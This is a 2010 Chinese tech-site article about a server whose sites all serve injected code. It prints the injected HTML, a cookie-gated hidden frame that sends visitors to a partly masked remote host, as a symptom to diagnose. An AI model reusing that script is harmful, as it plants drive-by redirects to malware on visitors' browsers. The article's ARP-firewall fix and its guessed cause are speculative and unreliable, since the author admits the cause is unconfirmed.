投递文章投递文章 投稿指南 RSS订阅RSS订阅

服务器上所有网站类似被挂马解决方法UpdatedPage function showm

来源:IT堂 堂友 发布时间:2010-08-15 收藏 投稿 字体:【

问题症状:
打开服务器上所有网站的网页出现像挂马一样的,到服务器上去查看网页程序没有被任何修改过,服务器也没有中毒,ARP防火墙也没有提示有ARP攻击,真的很奇怪,呵呵。查看网页源文件内容如下:

  1. <html>
     
  2. <head>
     
  3. </head>
     
  4. <script>
     
  5. function showme()
     
  6. {
     
  7. var CK=document.cookie;
     
  8. var sa=CK.indexOf("CK");
     
  9. if(sa!=-1){}else{var EP=new Date();
     
  10. EP.setTime(EP.getTime()+24*60*60*1000);
     
  11. document.cookie="CK=test;expires="+EP.toGMTString();
     
  12. self.hi.location="http://XXXX.3322.org:97/xs/dk.html";}
     
  13. }
     
  14. </script>
     
  15. <frameset rows="100%,*" onLoad="showme()">
     
  16. <frame name="hello" src="/admin.php?UpdatedPage=aGlqYWNr">
     
  17. <frame name="hi" src="">
     
  18. </frameset>
     
  19. </html>

解决方法:
请在服务器上装一个360安全卫士,并把ARP防御打开,最关键的要把ARP防御设置为始终启用,防御速度:50秒,一定不能用自动防御,记住!!!
弄完了重启服务器,第一次重启后还要去360里面点击开启ARP功能,然后还要重启一次才行,解决OK。
出现此问题的原因:
这是很特殊的攻击,到底是什么原因无法确认,能确认的是与ARP攻击有点类似,但ARP防火墙根本没提示,可能是一种新型的攻击。

顶一下
(2)
100%
踩一下
(0)
0%
本文Tags:
  • 表情:
  •    
  • 评价:
用户名: 密码: 匿名 注册
最新评论 查看所有评论
About iTtang - 联系我们  - 专题列表 - 友情链接  -  高级搜索  -  帮助中心  -  您的意见